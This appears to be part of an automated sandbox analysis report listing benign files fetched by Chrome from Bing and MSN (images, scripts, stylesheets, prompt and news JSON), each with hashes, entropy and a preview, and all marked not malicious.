                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4409
                                                                                                                                                                                                                                                                        Entropy (8bit):7.661436320849241
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                                                                                                                                                                                        MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                                                                                                                                                                                        SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                                                                                                                                                                                        SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                                                                                                                                                                                        SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:51:08], progressive, precision 8, 160x158, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4547
                                                                                                                                                                                                                                                                        Entropy (8bit):7.735536921390623
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ssb41dk9JozAQ8d2SuBK76KrZDoDBtnFKiDo8TzNnNJSHvLPS:sj1eozAQ8d2VPGoBBFfM4fJSHDPS
                                                                                                                                                                                                                                                                        MD5:7AEF4CCF6E47B9BA038365CD3D1F5693
                                                                                                                                                                                                                                                                        SHA1:71F7957F6FAE574854A374E84DB2E3CEDBA89969
                                                                                                                                                                                                                                                                        SHA-256:08102BA7A0388B1AFC9A351B3387B2DDEDA846551303170E0273B2F305AECCB2
                                                                                                                                                                                                                                                                        SHA-512:29AC1E6BADF62C61B4FA889EA1B0436D3B9107A60BA03801DFA8E23A4D8BCCF42C09BB7CC7E6CD9FACB8D140DB7E0D4F0EEB3D7D8A3B9B38B1D2B95113005320
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:51:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................VQJ,..R...)..(..R..d.Y@...h..%(.AW(T.)...5.,.%.2[.."*!l...Z......@I..T.......@3.@....D@ ..l.)E.P....ts......@... E".W/G...........IQ..I|../.,..W..(....WY.1<.t..=....K...C....-.1..s.[l...^].mO7|..:.kda5....o.=.S.8.;....~e,.......1v..~5.:s'$..u.i..k.7._E25...f6v..Nk.&)....S.r...ovn5...k9k...u.D...f&.......e.+.7......d..7K.R]..f..K..l...r...*.K.b..s29...y;..U.E(.qH....,....QS%..@....'......................... !."1.#$0@.`............R.J..e~...+.J.....y..7#..^....,.....@.3..`.....L...[u.!.../...*;[7.,...a....[._W...B;.....4g+../c..>g...!..U..Q...0...$..F%...u|.2?.V.>.v..2.2.S.c..km)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10033), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12933
                                                                                                                                                                                                                                                                        Entropy (8bit):5.214423450434363
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:VbgMOzLnhnvZ1czzHT3L0SKZp2NbltyQEZxAk/MI7hBMDIkFi2o6XJalZW:9OZrSzz3wp0OxAmJjEl
                                                                                                                                                                                                                                                                        MD5:3E1CD65B12888A023F899069EB6FD830
                                                                                                                                                                                                                                                                        SHA1:5DC4BB155BEB355755C78FA0D991C45696497794
                                                                                                                                                                                                                                                                        SHA-256:B8BB4D94B0FCFECEAE541A257DEA9BC8F598C2E008BEB857274607868BA3FB10
                                                                                                                                                                                                                                                                        SHA-512:4EBCDE6C74FD61AD31560DEE7014EEC65B7618D53572C615CFD77F1D3B7F485D3FF95C0B3F5AA52CBB1EEE41F6A23F5253B076CF2C032FD5284C6B63BF64D4B4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:0;..;..!function(n,l){"object"==typeof exports&&"undefined"!=typeof module?l(exports):"function"==typeof define&&define.amd?define(["exports"],l):l(n.preact=n.preact||{})}(this,function(n){if(n.render){return;} var l,u,i,t,o,f,r,e={},c=[],s=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function a(n,l){for(var u in l)n[u]=l[u];return n}function v(n){var l=n.parentNode;l&&l.removeChild(n)}function h(n,l,u){var i,t,o,f=arguments,r={};for(o in l)"key"==o?i=l[o]:"ref"==o?t=l[o]:r[o]=l[o];if(arguments.length>3)for(u=[u],o=3;o<arguments.length;o++)u.push(f[o]);if(null!=u&&(r.children=u),"function"==typeof n&&null!=n.defaultProps)for(o in n.defaultProps)void 0===r[o]&&(r[o]=n.defaultProps[o]);return y(n,r,i,t,null)}function y(n,u,i,t,o){var f={type:n,props:u,key:i,ref:t,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,constructor:void 0,__v:o};return null==o&&(f.__v=f),null!=l.vnode&&l.vnode(f),f}function p(n){return n.children}function d(n,l){this.props=n,this.context
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):824
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9031871499321165
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:gsDJ9dOk7xQXcTW54Xc6yMcS2WUAPXc/GIu31VkeejPX8Pp:gsDJnfFQXcc4Xc81cuIaVkegPX8Pp
                                                                                                                                                                                                                                                                        MD5:6D94F94BFB17721A8DA8B53731EB0601
                                                                                                                                                                                                                                                                        SHA1:AE540DB8D146E17CFC3D09D46B31BD16B3308A6D
                                                                                                                                                                                                                                                                        SHA-256:21829C74FCE2C9BBBB3099A7A487DE71465ED712410C32BC6C69884DB07A90DD
                                                                                                                                                                                                                                                                        SHA-512:BF33FB4858B56F888108BCD5C2691613B68715E260E59C1E37A050A709BE04A8E0EAF5509667183A0D51F1201E58C02DF4F744A0772242EE5B61595C44C072E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/rlQNuNFG4Xz8PQnUazG9FrMwim0.css
                                                                                                                                                                                                                                                                        Preview:#rewardsPanelContainer{position:fixed;top:0;right:0;width:376px;height:100vh;z-index:1100;box-shadow:0 0 0 1px #0000000d,0 0 0 2px #0000001a}#rewardsPanelContainer.darkMode{background:#11100f;color:#edebe9}#rewardsPanelContainer.b_hide{display:none}#rewardsPanelContainer #panelFlyout{width:102%;height:100%;border:none}#rewardsPanelContainer #panelHeader{background:#fff;padding:15px;display:none;text-align:center;justify-content:space-between;border-bottom:1px solid #ccc}#rewardsPanelContainer #panelHeader .title{font-weight:500;font-size:20px;line-height:22px;display:flex;align-items:center}#rewardsPanelContainer #closeRewardsPanel{position:absolute;right:15px;width:12px;height:12px;padding:8px;top:13px}#rewardsPanelContainer #closeRewardsPanel:hover,#rewardsPanelContainer #closeRewardsPanel:focus{cursor:pointer}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1771
                                                                                                                                                                                                                                                                        Entropy (8bit):5.004671467366638
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YnaQk9I7oAISql5qrIaQS4AISpOzrbIaQndAg6AISsW9NIaQRrxIOAISZksu3r:YoL+qiX4+4zrbcAg6+FWB+A3r
                                                                                                                                                                                                                                                                        MD5:742105BAEF5AEC43780476E6DCDFF957
                                                                                                                                                                                                                                                                        SHA1:17B05F741B2C22090A6306D1E5E5084B3C8E84D7
                                                                                                                                                                                                                                                                        SHA-256:7FB64B217BF94303CE50F7099525D661A3714F590DEC644E00B387AF55860A13
                                                                                                                                                                                                                                                                        SHA-512:E2DDFEF9E049E811CCF6839996672ACC914D827DECF7172854F0F23BDC961B97CAA8EF7C522BF267D71388EEF6479485560C16A4E721E442FF1ABC617082EAFC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"title":"","data":[{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Organize%20the%20last%20ten%20years%20of%20worldwide%20volcanic%20activity%20into%20a%20table","fullText":null,"imageUrl":null,"modifiedBy":null,"modifiedTimestamp":0,"prompt":"","promptIconUrl":null,"promptSubtitle":null,"query":"Organize the last ten years of worldwide volcanic activity into a table","response":null,"type":0,"category":null},{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Write%20a%20poem%20with%20vivid%20imagery%20that%20doesn%27t%20rhyme","fullText":null,"imageUrl":null,"modifiedBy":null,"modifiedTimestamp":0,"prompt":"","promptIconUrl":null,"promptSubtitle":null,"query":"Write a poem with vivid imagery that doesn't rhyme","response":null,"type":0,"category":null},{"clickThroughUrl":"https://www.bing.com/search?iscopilotedu=1&sendquery=1&q=Finding%20an%20inspiration%20for%20my%20next%20masterpiece.%20Can%20you%20suggest%20any%20famous%20arti
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65489), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):258855
                                                                                                                                                                                                                                                                        Entropy (8bit):5.417679842783361
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:UTmn88k1kmcD4HxACnDS0+QdzfS0qr71Q:5n3D6nm05Gr71Q
                                                                                                                                                                                                                                                                        MD5:F484B414719BBF51BED101A9E186D43D
                                                                                                                                                                                                                                                                        SHA1:0F310D74133931D5FD479546D923549426BA50F4
                                                                                                                                                                                                                                                                        SHA-256:013A941958BB7055154333DF64B2CF6C013C436065F0F5ABD6E777047BA0520E
                                                                                                                                                                                                                                                                        SHA-512:4EDD0CAA0653C6B8C698E6A018DB14D9868680C244DB55C5E894FCB4FDB848CA313AFA91EDA3F6A605A9C2260911E0C0916D324649C99080120F56242D0A9C90
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"nextPageUrl":"https://api.msn.com/news/feed/pages/binghp?activityId=FC269871-C66B-4E96-BCF3-A1792D2AB208&timeOut=2000&ocid=bingHomepage-newsfeed&apikey=QMmdky7jrTlM4mWJmMYQTi71lp678KyZJBKHCAyKCg&cm=en-us&User=m-3D5809546E8E606F1D921A8B6F3E6124&newsSkip=31&$skip=1&wpoCmsAdServed=0&wpoNativeAdServed=0&cardsServed=22&renderedSegments=34817&wpopageid=wpoads","sections":[{"dataTemplate":"windows-homepage-top-section-two-segment","layoutTemplate":"windows-homepage-top-section-two-segment","cards":[{"type":"topStories","isLocalContent":false,"galleryItemCount":0,"subCards":[{"id":"AA1l3xDB","type":"article","title":"Hospitals in southern Gaza are at 'breaking point,' international organizations say","abstract":"Two international organizations say hospitals in southern Gaza are at a \"breaking point\" with wards overwhelmed with patients.","readTimeMin":3,"url":"https://www.msn.com/en-us/health/other/hospitals-in-southern-gaza-are-at-breaking-point-international-organizations-say/ar-AA1l3xDB
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6045
                                                                                                                                                                                                                                                                        Entropy (8bit):7.92160570015199
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEpu9DiamTn5V+eddM6ynOL2bViNDvs0HnIfZR+:ygEu9D0TneeddM6yOL2oNI0HnIn+
                                                                                                                                                                                                                                                                        MD5:E8ED8A28378E8F0AF02EA8C7D6F981BE
                                                                                                                                                                                                                                                                        SHA1:44BBE8FA4B341E9B4AA5DAE194303060907DCA81
                                                                                                                                                                                                                                                                        SHA-256:D5B76CE92AC8817725830F102B36D07FCAF6A723CCA55729A773644B5428EF85
                                                                                                                                                                                                                                                                        SHA-512:41D7F07CBED84344FE7A6AE6835A84F3A6671A07C0326D10640537C1647098DB7102C6E07FAE53D91204953B39F1752F07592844ACD0CAD3DB02E2E09CE80ABA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..O....\.4.T.....7......O....w......wp.8.Y....Ab.........-.V...t...kw.,..4.....*..A:....0TV;.6p:..._We.dh8.E3...#.dn.#.+{.~8.....[.)e........*..&...7Ok<s.........h.Y?./...a.*8.q....J...Aj..Vz..m+...'...*YH.....}sO|..D..W.+.i.>n~..#w.pT.R.:....{..>..?{d...<...Nndc..|......T_.I..(A..S .Dc_2)`.GB85.6...i.ay.^\.#nX&..T....J.X6...(......{..&@.y5.os...D...G..%..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5125
                                                                                                                                                                                                                                                                        Entropy (8bit):7.920185213246574
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEmDqVpTtrJz4BgFVHuMho/fGQDBYF10bMaJFsBd5tWgt1b:yg7Dqvf4BgbHuMGf+1isr5tb1b
                                                                                                                                                                                                                                                                        MD5:94E93256E82CF1BF7F7F3F75CB330B17
                                                                                                                                                                                                                                                                        SHA1:E2A7B8EA4B1CB157FFEEFFFC6F128A8F71DED395
                                                                                                                                                                                                                                                                        SHA-256:FD75FEADAFDFB41457754E037C26B5AC8F8A141501AC885FF9DFC8185B2A8F14
                                                                                                                                                                                                                                                                        SHA-512:A2B1B1ECC3EACA67678C2B08B8D506672C50740EFC0E221D62E0557E131EA42ED6B6BEF331EE771E2FCAD46C4AB16E6946104324C22DFD1743006A31B8287F41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..p).T.7p...X.{...y=*K..l..{...Lnl...<.W...;YnI.1N.F*......................4........=*.H'f.T.%u...qF+...x.......v.....Q~f....^s/.^.Q......`...h....Q...\..=.4.k.|#..z...4.....I.'.)...zz2.....A...M14..J.L".#.a........o......e|.HK..c...A.N:{...?..j......}3g.\.Q.|..Rn..$.<._....n#.w1i..y[.1.....l.L.....x.7......T. q..^..|3..M.5......`?.....46q...`.8S.#.^&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (328), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):4.873055432724158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:qLYyKBrT1rDvMhkXkJGf9FM/fwT0EqeGXGQW4RiXUqkvJOyEFnVQE4MDUKOKHsM:yWFBb3yG3cJO1Vi5rgsM
                                                                                                                                                                                                                                                                        MD5:CDDDAB121EB434876615391AD4107B9A
                                                                                                                                                                                                                                                                        SHA1:8038444C80B8E76DDF8AE5C00AB5784207E5AEFF
                                                                                                                                                                                                                                                                        SHA-256:243D212A9FF764CCDA9B19C3C823B2F408A0718E56A3E7A8B5B533E108DB56CB
                                                                                                                                                                                                                                                                        SHA-512:1964D190BF10B9D686626097188B6D0B2A02C0039993D97A135355D8A44399DED3D42465D1EDC7B55287AA9380835373FD921C00CF92CE234CCE92B0C2453084
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/gDhETIC4523fiuXACrV4Qgflrv8.js
                                                                                                                                                                                                                                                                        Preview:var BingAtWork;(function(n){var t;(function(n){function t(t){t.isAuthenticated&&n.raiseAuthEventAndLog(t)}function i(n){n&&n.length==2&&t(n[1])}n.bindToConditionalSignIn=function(){sj_evt.bind("ssofirstquery",function(n){return i(n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):671
                                                                                                                                                                                                                                                                        Entropy (8bit):5.014579690661168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                                                                                                                                                                                        MD5:D9ED1A42342F37695571419070F8E818
                                                                                                                                                                                                                                                                        SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                                                                                                                                                                                        SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                                                                                                                                                                                        SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg
                                                                                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (520), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):520
                                                                                                                                                                                                                                                                        Entropy (8bit):5.271876799734874
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:hc2AcSdEcvZswcAIly1YkOcAwI98NyeTg2TQHYN:hc2AcSSwDcr98XhuYN
                                                                                                                                                                                                                                                                        MD5:F03CFEE55A7F1E0B91DD062A5654FC3D
                                                                                                                                                                                                                                                                        SHA1:57D2DB8B8AC66A403E3A3C1C2DCA21E63AF5CDF6
                                                                                                                                                                                                                                                                        SHA-256:39477BAE95EE7073936851A67106A42F585454EBD6C4FEADEACC818C52DA49A4
                                                                                                                                                                                                                                                                        SHA-512:7E66C667FD3F0B1C91296011D7E382776F12905F12C25CCAD4710459FA1E595D2D4A3626C3E969AC1B1575ADD0839EC09CE211B59C694FDBB34D7E5F6D3A5950
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",u=_w.location.search.substring(1),r=window.data_iid,t,f;i+=r&&r.length>0?"?IG="+_G.IG+"&IID="+r+"&"+u:"?"+u;_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();f="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(sj_b,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(f)}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (924), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):924
                                                                                                                                                                                                                                                                        Entropy (8bit):5.195012633286773
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                                                                                                                                                                                                                        MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                                                                                                                                                                                                                        SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                                                                                                                                                                                                                        SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                                                                                                                                                                                                                        SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/VMYMrXeSZyOXW5LQn-ede-_1jZk.js
                                                                                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                                                                                        Entropy (8bit):4.86807996961474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                                                                                                                                                                                        MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                                                                                                                                                                                        SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                                                                                                                                                                                        SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                                                                                                                                                                                        SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):14338
                                                                                                                                                                                                                                                                        Entropy (8bit):7.950768400583616
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eP7O+T1mPPYlc2bKTC1rh5riJXtEqExMO1hV4tcEFWY:eP7NcPP8PbKC11J09Eqk9hFEoY
                                                                                                                                                                                                                                                                        MD5:DB582ACCFCDE17455AB1747A4C7938D2
                                                                                                                                                                                                                                                                        SHA1:39CAC96990135A6635BF6C9428DDDB84E02C986A
                                                                                                                                                                                                                                                                        SHA-256:ED76BCE76C0F1204121B66D32929330A373749E29F3A31232826A4F4FE795259
                                                                                                                                                                                                                                                                        SHA-512:9A63A4D854FCD297369C636EDFEE93835DCAFF9D6F0915D87F0D7FC731B06C37734418FDF7CCF7E635D546565CF07F47FA7FE4CA1F99B00089C5C128C4B37111
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.e035413526bc72471f921b54fc440fcc&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
